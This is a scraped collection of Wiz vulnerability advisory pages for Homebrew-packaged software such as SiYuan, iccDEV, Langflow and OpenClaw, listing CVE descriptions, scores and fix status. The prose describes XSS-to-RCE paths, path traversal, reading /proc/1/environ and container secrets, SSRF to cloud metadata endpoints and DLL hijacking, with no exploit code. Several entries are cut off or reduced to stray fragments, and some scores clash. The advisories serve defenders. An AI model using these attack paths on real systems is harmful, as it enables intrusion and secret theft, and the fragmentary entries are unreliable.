CVE-2026-23847 [LOW] CVE-2026-23847 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23847 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Versions prior to 3.5.4 are vulnerable to reflected cross-site scripting in /api/icon/getDynamicIcon due to unsanitized SVG input. The endpoint generates SVG images for text icons (type=8). The content query parameter is inserted directly into the SVG tag without XML escaping. Since the response Content-Type is image/svg+xml, injecting unescaped tags allows breaking the XML structure and executing JavaScript. Version 3.5.4 patches the issue.]
Source : NVD
## 2.1
Score
Published January 19, 2026
Severity LOW
CNA Score 2.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation
Wiz
CVE-2026-24856 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-24856 [HIGH] CVE-2026-24856 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24856 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Versions prior to 2.3.1.2 have an undefined behavior issue when floating-point NaN values are converted to unsigned short integer types during ICC profile XML parsing potentially corrupting memory structures and enabling arbitrary code execution. This vulnerability affects users of the iccDEV library who process ICC color profiles. ICC Profile Injection vulnerabilities arise when user-controllable input is incorporated into ICC profile data or other structured binary blobs in an unsafe manner. Version 2.3.1.2 contains a fix for the issue. No known workarounds are available.
Source :
Wiz
CVE-2026-3387 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-3387 [MEDIUM] CVE-2026-3387 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3387 :
Homebrew vulnerability analysis and mitigation
A vulnerability has been found in wren-lang wren up to 0.4.0. Affected by this issue is the function getByteCountForArguments of the file src/vm/wren_compiler.c. Such manipulation leads to null pointer dereference. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 4.8
Score
Published March 1, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.2
Exploitation Probability (EPSS) N/A
Af
Wiz
CVE-2026-33743 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-33743 [MEDIUM] CVE-2026-33743 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33743 :
Homebrew vulnerability analysis and mitigation
Incus is a system container and virtual machine manager. Prior to version 6.23.0, a specially crafted storage bucket backup can be used by an user with access to Incus' storage bucket feature to crash the Incus daemon. Repeated use of this attack can be used to keep the server offline causing a denial of service of the control plane API. This does not impact any running workload, existing containers and virtual machines will keep operating. Version 6.23.0 fixes the issue.
Source : NVD
## 6.5
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Proba
Wiz
CVE-2026-24405 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-24405 [HIGH] CVE-2026-24405 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24405 :
Homebrew vulnerability analysis and mitigation
iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have a Heap Buffer Overflow vulnerability in CIccMpeCalculator::Read(). This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2.
Source : NVD
## 8.8
Score
Published January 24, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Ex
Wiz
CVE-2026-31795 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-31795 [HIGH] CVE-2026-31795 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31795 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a stack buffer overflow write in CIccXform3DLut::Apply() corrupting stack memory or crash. This vulnerability is fixed in 2.3.1.5.
Source : NVD
## 7.8
Score
Published March 10, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 16, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in
Wiz
CVE-2026-3388 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-3388 [MEDIUM] CVE-2026-3388 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3388 :
Homebrew vulnerability analysis and mitigation
A vulnerability was found in Squirrel up to 3.2. This affects the function SQCompiler::Factor/SQCompiler::UnaryOP of the file squirrel/sqcompiler.cpp. Performing a manipulation results in uncontrolled recursion. The attack needs to be approached locally. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 4.8
Score
Published March 1, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Exploitation Probability (EPSS) N/A
Affected
Wiz
CVE-2026-33669 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-33669 [CRITICAL] CVE-2026-33669 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33669 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Prior to version 3.6.2, document IDs were retrieved via the /api/file/readDir interface, and then the /api/block/getChildBlocks interface was used to view the content of all documents. Version 3.6.2 patches the issue.
Source : NVD
## 7.5
Score
Published March 26, 2026
Severity HIGH
CNA Score 9.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
github.com/siyuan-note/siyuan/kernel
siyuan
Sources
NVD
GoLang Severity CRITICAL No Fix Added at: Mar 26, 2026
Homebrew
Wiz
CVE-2026-33067 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33067 [MEDIUM] CVE-2026-33067 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33067 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Versions 3.6.0 and below render package metadata fields (displayName, description) using template literals without HTML escaping. A malicious package author can inject arbitrary HTML/JavaScript into these fields, which executes automatically when any user browses the Bazaar page. Because SiYuan's Electron configuration enables nodeIntegration: true with contextIsolation: false, this XSS escalates directly to full Remote Code Execution on the victim's operating system — with zero user interaction beyond opening the marketplace tab. This issue has been fixed in version 3.6.1.
Source : NVD
## 5.3
Score
Published March 20, 2026
Severity MEDIUM
CNA Score 5.3
Affected T
Wiz
CVE-2026-26323 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-26323 [HIGH] CVE-2026-26323 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26323 :
Homebrew vulnerability analysis and mitigation
scripts/update-clawtributors.ts
bun scripts/update-clawtributors.ts
@users[.]noreply[.]github[.]com
npm i -g openclaw
git log
execSync
Source : NVD
## 8.6
Score
Published February 19, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
openclaw
Sources
NVD
npm Severity HIGH Has Fix Added at: Feb 18, 2026
Homebrew Severity HIGH Has Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so
Wiz
CVE-2026-24857 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-24857 [MEDIUM] CVE-2026-24857 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24857 :
Homebrew vulnerability analysis and mitigation
bulk_extractor
bulk_extractor
Unpack::CopyString
Source : NVD
## 5.5
Score
Published January 28, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
bulk_extractor
Sources
NVD
Homebrew Severity CRITICAL No Fix Added at: Feb 11, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exp
Wiz
CVE-2026-31870 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-31870 [HIGH] CVE-2026-31870 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31870 :
Homebrew vulnerability analysis and mitigation
cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to 0.37.1, when a cpp-httplib client uses the streaming API (httplib::stream::Get, httplib::stream::Post, etc.), the library calls std::stoull() directly on the Content-Length header value received from the server with no input validation and no exception handling. std::stoull throws std::invalid_argument for non-numeric strings and std::out_of_range for values exceeding ULLONG_MAX. Since nothing catches these exceptions, the C++ runtime calls std::terminate(), which kills the process with SIGABRT. Any server the client connects to — including servers reached via HTTP redirects, third-party APIs, or man-in-the-middle positions can cras
Wiz
CVE-2025-68478 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2025-68478 [HIGH] CVE-2025-68478 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68478 :
Homebrew vulnerability analysis and mitigation
fs_path
Source : NVD
## 7.1
Score
Published December 19, 2025
Severity HIGH
CNA Score 7.1
Affected Technologies
Homebrew
LangFlow
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 19
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
langflow
Sources
NVD
pip Severity HIGH Has Fix Added at: Dec 22, 2025
Homebrew Severity HIGH Has Fix Added at: Jan 04, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KE
Wiz
CVE-2026-22882 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-22882 [MEDIUM] CVE-2026-22882 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22882 :
Homebrew vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the EMF functionality of Canva Affinity. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.
Source : NVD
## 7.1
Score
Published March 17, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
affinity
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a priorit
Wiz
CVE-2026-22561 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.7
CVE-2026-22561 [MEDIUM] CVE-2026-22561 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22561 :
Homebrew vulnerability analysis and mitigation
Uncontrolled search path elements in Anthropic Claude for Windows installer (Claude Setup.exe) versions prior to 1.1.3363 allow local privilege escalation via DLL search-order hijacking. The installer loads DLLs (e.g., profapi.dll) from its own directory after UAC elevation, enabling arbitrary code execution if a malicious DLL is planted alongside the installer.
Source : NVD
## 4.7
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 4.7
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
claude
Sources
NVD
Homeb
Wiz
CVE-2026-21490 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-21490 [MEDIUM] CVE-2026-21490 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21490 :
Homebrew vulnerability analysis and mitigation
CIccTagLut16::Validate()
Source : NVD
## 7.1
Score
Published January 6, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-3
Wiz
CVE-2026-0769 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-0769 [CRITICAL] CVE-2026-0769 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0769 :
Homebrew vulnerability analysis and mitigation
Langflow eval_custom_component_code Eval Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the implementation of eval_custom_component_code function. The issue results from the lack of proper validation of a user-supplied string before using it to execute python code. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-26972.
Source : NVD
## 9.8
Score
Published January 23, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Homebrew
Has Public Exploit
Wiz
CVE-2026-21492 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-21492 [MEDIUM] CVE-2026-21492 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21492 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a NULL pointer member call vulnerability. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available.
Source : NVD
## 5.5
Score
Published January 6, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages a
Wiz
CVE-2026-32981 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-32981 [HIGH] CVE-2026-32981 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32981 :
Homebrew vulnerability analysis and mitigation
A path traversal vulnerability was identified in Ray Dashboard (default port 8265) in Ray versions prior to 2.8.1. Due to improper validation and sanitization of user-supplied paths in the static file handling mechanism, an attacker can use traversal sequences (e.g., ../) to access files outside the intended static directory, resulting in local file disclosure.
Source : NVD
## 8.7
Score
Published March 17, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
ray
Sources
NVD
Homebrew
Wiz
CVE-2026-32747 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-32747 [MEDIUM] CVE-2026-32747 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32747 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. In versions 3.6.0 and below, the globalCopyFiles API eads source files using filepath.Abs() with no workspace boundary check, relying solely on util.IsSensitivePath() whose blocklist omits /proc/, /run/secrets/, and home directory dotfiles. An admin can copy /proc/1/environ or Docker secrets into the workspace and read them via the standard file API. An admin can exfiltrate any file readable by the SiYuan process that falls outside the incomplete blocklist. In containerized deployments this includes all injected secrets and environment variables - a common pattern for passing credentials to containers. The exfiltrated files are then accessible via the standard workspace fi
Wiz
CVE-2026-26324 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-26324 [HIGH] CVE-2026-26324 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26324 :
Homebrew vulnerability analysis and mitigation
0:0:0:0:0:ffff:7f00:1
127.0.0.1
Source : NVD
## 7.5
Score
Published February 19, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openclaw
Sources
NVD
npm Severity HIGH Has Fix Added at: Feb 18, 2026
Homebrew Severity HIGH Has Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Wiz
CVE-2026-26982 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2026-26982 [MEDIUM] CVE-2026-26982 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26982 :
Homebrew vulnerability analysis and mitigation
Ghostty is a cross-platform terminal emulator. Ghostty allows control characters such as 0x03 (Ctrl+C) in pasted and dropped text. These can be used to execute arbitrary commands in some shell environments. This attack requires an attacker to convince the user to copy and paste or drag and drop malicious text. The attack requires user interaction to be triggered, but the dangerous characters are invisible in most GUI environments so it isn't trivially detected, especially if the string contents are complex. Fixed in Ghostty v1.3.0.
Source : NVD
## 8.8
Score
Published March 10, 2026
Severity HIGH
CNA Score 6.3
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/
Wiz
CVE-2026-28434 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-28434 [MEDIUM] CVE-2026-28434 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28434 :
Homebrew vulnerability analysis and mitigation
cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to 0.35.0, when a request handler throws a C++ exception and the application has not registered a custom exception handler via set_exception_handler(), the library catches the exception and writes its message directly into the HTTP response as a header named EXCEPTION_WHAT. This header is sent to whoever made the request, with no authentication check and no special configuration required to trigger it. The behavior is on by default. A developer who does not know to opt in to set_exception_handler() will ship a server that leaks internal exception messages to any client. This vulnerability is fixed in 0.35.0.
Source : NVD
## 5.3
Sc
Wiz
CVE-2019-25448 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2019-25448 [MEDIUM] CVE-2019-25448 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2019-25448 :
Homebrew vulnerability analysis and mitigation
OrientDB 3.0.17 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by creating users with script payloads in the name parameter. Attackers can send POST requests to the document endpoint with JavaScript code in the name field to execute arbitrary scripts when users view the application.
Source : NVD
## 5.1
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12
Exploitation Probability (EPSS) N/A
Affected packages and libraries
orientdb
Sources
NVD
Homebrew Se
Wiz
CVE-2019-25449 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2019-25449 [MEDIUM] CVE-2019-25449 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2019-25449 :
Homebrew vulnerability analysis and mitigation
OrientDB 3.0.17 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by submitting crafted JSON payloads to the document endpoint. Attackers can send POST requests to /document/demodb/-1:-1 with script tags in the name parameter to execute arbitrary JavaScript in users' browsers.
Source : NVD
## 5.1
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
orientdb
Sources
NVD
Homebrew Severity MEDIUM No F
Wiz
CVE-2025-70038 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2025-70038 [HIGH] CVE-2025-70038 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-70038 :
Homebrew vulnerability analysis and mitigation
An issue pertaining to CWE-79: Improper Neutralization of Input During Web Page Generation was discovered in linagora Twake v2023.Q1.1223. This allows attackers to execute arbitrary code.
Source : NVD
## 8.8
Score
Published March 9, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
twake
Sources
NVD
Homebrew Severity HIGH No Fix Added at: Mar 16, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what'
Wiz
CVE-2025-68477 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
CVE-2025-68477 [HIGH] CVE-2025-68477 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68477 :
Homebrew vulnerability analysis and mitigation
Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0, Langflow provides an API Request component that can issue arbitrary HTTP requests within a flow. This component takes a user-supplied URL, performs only normalization and basic format checks, and then sends the request using a server-side httpx client. It does not block private IP ranges (127[.]0[.]0[.]1, the 10/172/192 ranges) or cloud metadata endpoints (169[.]254[.]169[.]254), and it returns the response body as the result. Because the flow execution endpoints (/api/v1/run, /api/v1/run/advanced) can be invoked with just an API key, if an attacker can control the API Request URL in a flow, non-blind SSRF is possible—ac
Wiz
CVE-2025-69234 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2025-69234 [CRITICAL] CVE-2025-69234 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69234 :
Homebrew vulnerability analysis and mitigation
Whale browser before 4.35.351.12 allows an attacker to escape the iframe sandbox in a sidebar environment.
Source : NVD
## 9.1
Score
Published December 30, 2025
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
whale
Sources
NVD
Homebrew Severity CRITICAL Has Fix Added at: Jan 14, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Wiz
CVE-2026-27576 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-27576 [MEDIUM] CVE-2026-27576 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27576 :
Homebrew vulnerability analysis and mitigation
OpenClaw is a personal AI assistant. In versions 2026.2.17 and below, the ACP bridge accepts very large prompt text blocks and can assemble oversized prompt payloads before forwarding them to chat.send. Because ACP runs over local stdio, this mainly affects local ACP clients (for example IDE integrations) that send unusually large inputs. This issue has been fixed in version 2026.2.19.
Source : NVD
## 4.8
Score
Published February 21, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Homebrew
MinimOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.3
Exploitation Probability (EPSS) N/A
Affected packages and li
Wiz
CVE-2026-30984 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-30984 [MEDIUM] CVE-2026-30984 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30984 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap out-of-bounds read in CIccCalculatorFunc::ApplySequence() causing an application crash. This vulnerability is fixed in 2.3.1.5.
Source : NVD
## 6.1
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Mar 16, 2026
## Get a CVE risk assessment
Get a prioritized view of
Wiz
CVE-2026-29079 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-29079 [HIGH] CVE-2026-29079 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29079 :
Homebrew vulnerability analysis and mitigation
Lexbor is a web browser engine library. Prior to 2.7.0, a type‑confusion vulnerability exists in Lexbor’s HTML fragment parser. When ns = UNDEF, a comment is created using the “unknown element” constructor. The comment’s data are written into the element’s fields via an unsafe cast, corrupting the qualified_name field. That corrupted value is later used as a pointer and dereferenced near the zero page. This vulnerability is fixed in 2.7.0.
Source : NVD
## 8.2
Score
Published March 13, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.3
Explo
Wiz
CVE-2025-67744 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.6
CVE-2025-67744 [CRITICAL] CVE-2025-67744 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67744 :
Homebrew vulnerability analysis and mitigation
DeepChat is an open-source artificial intelligence agent platform that unifies models, tools, and agents. Prior to version 0.5.3, a security vulnerability exists in the Mermaid diagram rendering component that allows arbitrary JavaScript execution. Due to the exposure of the Electron IPC renderer to the DOM, this Cross-Site Scripting (XSS) flaw escalates to full Remote Code Execution (RCE), allowing an attacker to execute arbitrary system commands. Two concurrent issues, unsafe Mermaid configuration and an exposed IPC interface, cause this issue. Version 0.5.3 contains a patch.
Source : NVD
## 9.6
Score
Published December 16, 2025
Severity CRITICAL
CNA Score 9.6
Affected Technologies
Homebrew
Has Public Exploit
Wiz
CVE-2025-69235 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-69235 [HIGH] CVE-2025-69235 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69235 :
Homebrew vulnerability analysis and mitigation
Whale browser before 4.35.351.12 allows an attacker to bypass the Same-Origin Policy in a sidebar environment.
Source : NVD
## 7.5
Score
Published December 30, 2025
Severity HIGH
CNA Score 7.5
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
whale
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 14, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Scor
Wiz
CVE-2022-50925 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2022-50925 [HIGH] CVE-2022-50925 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50925 :
Homebrew vulnerability analysis and mitigation
Prowise Reflect version 1.0.9 contains a remote keystroke injection vulnerability that allows attackers to send keyboard events through an exposed WebSocket on port 8082. Attackers can craft malicious web pages to inject keystrokes, opening applications and typing arbitrary text by sending specific WebSocket messages.
Source : NVD
## 8.6
Score
Published January 13, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
reflect
Sources
NVD
